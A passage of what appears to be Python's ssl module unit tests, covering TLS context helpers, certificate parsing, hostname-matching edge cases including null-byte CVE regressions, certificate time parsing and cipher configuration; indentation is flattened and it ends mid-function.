ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
    server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
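# Usage sketch for the helper above (hostname and CA come from the constants in this file):
#   client_context, server_context, hostname = testing_context()
#   # server side: server_context.wrap_socket(conn, server_side=True)
#   # client side: client_context.wrap_socket(sock, server_hostname=hostname)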
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
        # OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
        # partial wildcards ('www*') in the leftmost fragment are rejected,
        # even when combined with IDNA A-labels in later fragments.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if hasattr(socket, 'AF_INET6'):
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if hasattr(socket, 'AF_INET6'):
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
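        # Only stream (TCP) sockets can be wrapped; datagram sockets are
        # rejected with NotImplementedError by both the module-level helper
        # and SSLContext.wrap_socket().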
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
        # 99991231235959Z (RFC 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
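    """Tests for SSLContext construction and configuration: protocols,
    ciphers, options, verification settings and certificate loading."""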
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
